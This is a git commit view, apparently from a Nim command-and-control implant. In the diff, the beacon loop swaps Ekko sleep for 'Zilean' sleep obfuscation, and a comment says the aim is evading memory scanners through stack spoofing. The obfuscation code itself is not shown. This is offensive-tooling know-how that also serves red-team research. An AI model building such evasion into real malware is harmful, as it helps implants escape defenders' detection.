Implemented Zilean sleep obfuscation technique as an alternative to Ekko.

This commit is contained in:
Jakob Friedl
2025-09-02 21:41:04 +02:00
parent f7d97908d1
commit b19f8e1236
5 changed files with 246 additions and 87 deletions

View File

@@ -36,7 +36,8 @@ proc main() =
while true:
# Sleep obfuscation with stack spoofing to evade memory scanners
sleepEkko(ctx.sleep * 1000)
sleepObfuscate(ctx.sleep * 1000, ZILEAN)
# sleep(ctx.sleep * 1000)
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
echo "\n", fmt"[*] [{date}] Checking in."